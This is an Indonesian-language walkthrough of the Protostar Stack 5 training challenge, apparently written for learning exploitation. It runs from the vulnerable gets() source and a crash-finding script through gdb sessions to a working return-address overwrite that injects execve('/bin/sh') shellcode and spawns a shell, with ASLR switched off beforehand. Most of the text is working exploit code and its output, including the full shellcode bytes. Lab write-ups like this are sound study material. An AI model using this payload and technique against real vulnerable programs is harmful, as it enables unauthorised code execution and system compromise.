Protostar Stack 5
Alat dan Bahan
- Binary: stack5
- Sistem operasi: Debian 9 dengan arsitektur 64 bit.
Mengatur Lingkungan Pekerjaan
- Binary
Ambil binary dari VM Protostar.
$ scp [email protected]:/opt/protostar/bin/stack5 $PWD
- Source Code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);
}
- Mematikan ASLR
Matikan ASLR agar proses eksploitasi lebih mudah. Untuk mematikannya gunakan perintah berikut:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Identifikasi Kelemahan
$ ./stack5
1
Program menerima input dari stdin kemudian diproses melalui fungsi gets yang vulnerable. Tujuan akhirnya mengisi stack dengan shellcode kemudian mendapatkan akses shell.
fsi.sh
#!/bin/bash
buffer=""
for i in {1..2048}
do
echo $i
buffer+="A"
echo $buffer > /tmp/delete.me
./$1 < /tmp/delete.me
if [ $? -eq 139 ]; then
echo "SEGMENTATION FAULT on $i BUFFER"
break
fi
done
Eksploitasi
$ ./fsi.sh stack5
...
74
75
76
...
SEGMENTATION FAULT on 76 BUFFER
...
Dengan jumlah buffer sebesar 76 byte program mengalami segmentation fault. Agar bisa mendapatkan akses shell maka isi stack dengan shellcode pada akhir payload. Sesuai shellcode dengan arsitektur binary misal 32 bit.
$ file stack5
stack5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.18, BuildID[sha1]=13b062326baa245b4c84616ccde1279c97723364, not stripped
$ checksec stack5
[*] '/../stack5'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
Agar shellcode bisa dieksekusi oleh program maka tentukan register IP yang tepat.
$ python -c 'print "A"*76 + "BBBB" + "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"' > /tmp/del
$ sudo gdb -q stack5
gdb-peda$ r < /tmp/del
Starting program: /../stack5 < /tmp/del
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd660 ('A' <repeats 76 times>, "BBBB", '\220' <repeats 16 times>, "\061\300Ph//shh/bin\211\343PS\211\341\260\v̀")
EBX: 0x0
ECX: 0xfbad2088
EDX: 0xf7fb487c --> 0x0
ESI: 0x1
EDI: 0xf7fb3000 --> 0x1b2db0
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd6b0 --> 0x90909090
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd6b0 --> 0x90909090
0004| 0xffffd6b4 --> 0x90909090
0008| 0xffffd6b8 --> 0x90909090
0012| 0xffffd6bc --> 0x90909090
0016| 0xffffd6c0 --> 0x6850c031
0020| 0xffffd6c4 ("//shh/bin\211\343PS\211\341\260\v̀")
0024| 0xffffd6c8 ("h/bin\211\343PS\211\341\260\v̀")
0028| 0xffffd6cc --> 0x50e3896e
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()
gdb-peda$ x/32x 0xffffd660
0xffffd660: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd670: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd680: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd690: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd6a0: 0x41414141 0x41414141 0x41414141 0x42424242
0xffffd6b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd6c0: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e
0xffffd6d0: 0xb0e18953 0x0080cd0b 0x00000001 0xf7fb3000
Pada alamat 0xffffd6c0, shellcode bisa dieksekusi oleh program maka ganti payload BBBB menjadi \xc0\xd6\xff\xff.
$ python -c 'print "A"*76 + "\xc0\xd6\xff\xff" + "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"' > /tmp/shell
$ gdb-peda$ r < /tmp/shell
Starting program: /../stack5 < /tmp/shell
process 26245 is executing new program: /bin/dash
[Inferior 1 (process 26245) exited normally]
gdb-peda$
Catatan: Nomor versi sistem operasi yang digunakan oleh binary berpengaruh terhadap proses GLIBC.